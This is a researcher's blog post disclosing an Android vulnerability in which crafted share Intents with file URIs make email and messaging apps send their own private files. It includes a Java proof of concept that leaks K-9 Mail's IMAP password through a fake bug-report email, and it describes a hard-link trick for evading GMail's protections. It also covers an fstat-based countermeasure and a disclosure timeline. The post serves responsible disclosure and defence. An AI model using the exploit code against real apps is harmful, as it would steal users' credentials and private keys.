Surreptitious Sharing on Android

Dominik Schürmann found a vulnerability present in many Android communication apps

Many email and messaging apps on Android use the Intent API to send files shared from other apps, such as Android's gallery. These Intents are standardized for sending and receiving content. Instead of passing entire files, such as videos, through this API, only URIs pointing to the actual storage location are exchanged. We found a vulnerability in this use of the Intent API, present in many published communication apps, that allows privilege escalation and data leakage. In the worst case, it can leak the private keys stored by popular encrypted messaging apps such as Threema, Telegram, or Signal.

While private app storage is separated via Unix file permissions, an app can always access its own private files. Thus, a malicious app can share a URI using the file scheme that points to a private file of the receiving app. Many apps, such as email and messaging clients, accept these URIs and offer to send their own private file to communication partners. We call this vulnerability Surreptitious Sharing. In this blog post, we give a short overview of how it can be exploited in practice and provide a backward compatible library as a countermeasure.

Details

The main issue lies in the fact that apps can access their private data directories not only using Context.openFileOutput(String name, int mode), but also using file URIs. While these URIs are normally used to access files on the SD card, via file:///sdcard/paper.pdf for example, they can also point to private files, e.g., file:///data/data/com.example.app/files/paper.pdf. If an app registers Intent Filters to support Android's sharing API, or defines custom Intents accepting URIs, it potentially accepts file URIs that point to its own private files. For apps facilitating communication, like email or messaging apps, this leads to what we call Surreptitious Sharing. To our knowledge, a similar issue was first documented as vulnerability OKC-01-010 in Cure53's security audit of the OpenPGP app OpenKeychain. While their report applies this issue to the file encryption API in OpenKeychain, we apply it in a broader context to communication apps. Investigating the AOSP source code reveals that support for file URIs in ContentResolver was already planned to be removed; see the inline comments in its openInputStream method (similar checks are present in openAssetFileDescriptor).

Research Paper

A pre-published version of our research paper, presented at GI Sicherheit 2016, is available as schuermann-sicherheit2016.pdf. In this paper we analyze 4 email and 8 messaging apps in detail and find that 8 out of the 12 apps are vulnerable.

Example Exploitation

This example is intended to surreptitiously share the IMAP passwords of K-9 Mail with an attacker. Please note that K-9 Mail serves only as an example: the issue has already been fixed in the current release and was present in many more apps, as discussed in our research paper. As shown by the screenshots, a malicious app could show a screen indicating that a problem has occurred, urging the user to report the bug to the developers. Touching the button starts a malicious Intent specially crafted for a particular email client, with a URI pointing to a private file of this email app that contains the IMAP password.

The code required to execute this attack follows:

import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;

// Address K-9 Mail's compose activity directly instead of going through the system chooser
Intent i = new Intent();
i.setComponent(new ComponentName("com.fsck.k9", "com.fsck.k9.activity.MessageCompose"));
i.setAction(Intent.ACTION_SEND);
i.setType("text/plain");
// file URI pointing into K-9 Mail's own private data directory; this database holds the IMAP password
Uri uri = Uri.parse("file:///data/data/com.fsck.k9/databases/preferences_storage");
i.putExtra(Intent.EXTRA_STREAM, uri);
// Prefilled recipient, body and subject make the message look like an ordinary bug report
i.putExtra(Intent.EXTRA_EMAIL, new String[]{"support@company.com"});
i.putExtra(Intent.EXTRA_TEXT, "Dear support team,...");
i.putExtra(Intent.EXTRA_SUBJECT, "Bug Report");

To make it more difficult for a user to detect this data leakage, and to circumvent protection mechanisms in GMail, a hard link can be created and named "bug-report", for example (details are available in the paper). In the paper, we stated: "However, we were not able to exploit GMail on Android 6, maybe due to the new runtime permissions; this has not been investigated further." In discussions with Google engineers, it became clear that the hard link could indeed not be created on Android 6, but the reason is the new SELinux policies rather than runtime permissions. This can be reproduced by connecting to an Android device via adb shell and observing the output of dmesg | grep avc.

Countermeasure

We provided a fix for app developers that uses fstat to check whether a file is owned by the receiving app itself and, if so, refuses to open it. Because it relies on fstat, our Java fix was only available for Android >= 5, but thanks to cketti, the lead developer of K-9 Mail, a library has been created for backward compatibility. We strongly recommend using this library to fix the issue in your app: https://github.com/cketti/SafeContentResolver.
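The following is an added example illustrating the ownership check described above (it is not the code of this post or of the SafeContentResolver library): before an app consumes a shared URI, it opens the descriptor, calls fstat on it and rejects the file if its owner UID equals the app's own UID, which catches the private file URIs from the Details section as well as hard links to them. It assumes Android API >= 21 (android.system.Os) and a Context available to the caller; the class name SafeStreamOpener is hypothetical.

```java
import android.content.ContentResolver;
import android.content.Context;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import android.os.Process;
import android.system.ErrnoException;
import android.system.Os;
import android.system.StructStat;
import java.io.FileNotFoundException;
import java.io.IOException;

// Hypothetical helper (added example, not the post's or the library's code).
public final class SafeStreamOpener {
    private SafeStreamOpener() {}

    /**
     * Opens a shared URI for reading but refuses files owned by this very app.
     * The ownership check runs on the opened descriptor (fstat), not on the URI
     * string, so renamed hard links or symlinks to a private file are caught too.
     */
    public static ParcelFileDescriptor openSafely(Context context, Uri uri) throws IOException {
        ContentResolver resolver = context.getContentResolver();
        ParcelFileDescriptor pfd = resolver.openFileDescriptor(uri, "r");
        if (pfd == null) {
            throw new FileNotFoundException("No descriptor for " + uri);
        }
        StructStat st;
        try {
            st = Os.fstat(pfd.getFileDescriptor());
        } catch (ErrnoException e) {
            pfd.close();
            throw new IOException("fstat failed for " + uri, e);
        }
        if (st.st_uid == Process.myUid()) {
            // A file in our own private storage: sending it would be Surreptitious Sharing.
            pfd.close();
            throw new SecurityException("Refusing to share own private file: " + uri);
        }
        return pfd;
    }
}
```

Content URIs served by another app's provider pass this check because the underlying file belongs to that app's UID; a file the app legitimately wants to send from its own storage must be handled by a separate, explicit path rather than by weakening this check.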

Android N

As noted in Commonsware's blog, support for the file scheme has been removed in the Android N Developer Preview. We don't know whether this was done in response to this vulnerability, but we suspect the change was already planned before we reported the problem, as comments inside the AOSP source code already indicated upcoming changes. Commonsware provides great blog posts on how to consume and provide file access over content URIs.

Responsible Disclosure

  • 2016-01-29 Informed Google via AOSP's bug tracker (non-public bug report)
  • 2016-02-01 Informed developers of evaluated vulnerable apps: K-9 Mail, WEB.DE Mail, Skype, Threema, Signal, Telegram (except GMail, AOSP Mail, which are maintained by Google)
  • 2016-04-04 Public disclosure via blog post
  • 2016-04-06 Presentation on GI Sicherheit 2016
We would like to acknowledge that the developers of K-9 Mail, WEB.DE Mail, Threema, and Telegram answered very quickly, while no response has been received from Microsoft. Thus, Skype is still vulnerable. It is important to note that we only informed the developers of apps that were explicitly evaluated in our paper. The issue is definitely present in many more apps besides the ones discussed.

Acknowledgments

  • Cure53 for discovering a similar issue in OpenKeychain, OKC-01-010
  • cketti and 1 & 1 Mail & Media Development & Technology GmbH for developing a backward compatible fix
  • Google and Telegram for the bug bounties

Contact

If you have more questions, please contact Dominik Schürmann.


last changed 2016-04-04, 15:03 by Dr. Dominik Schürmann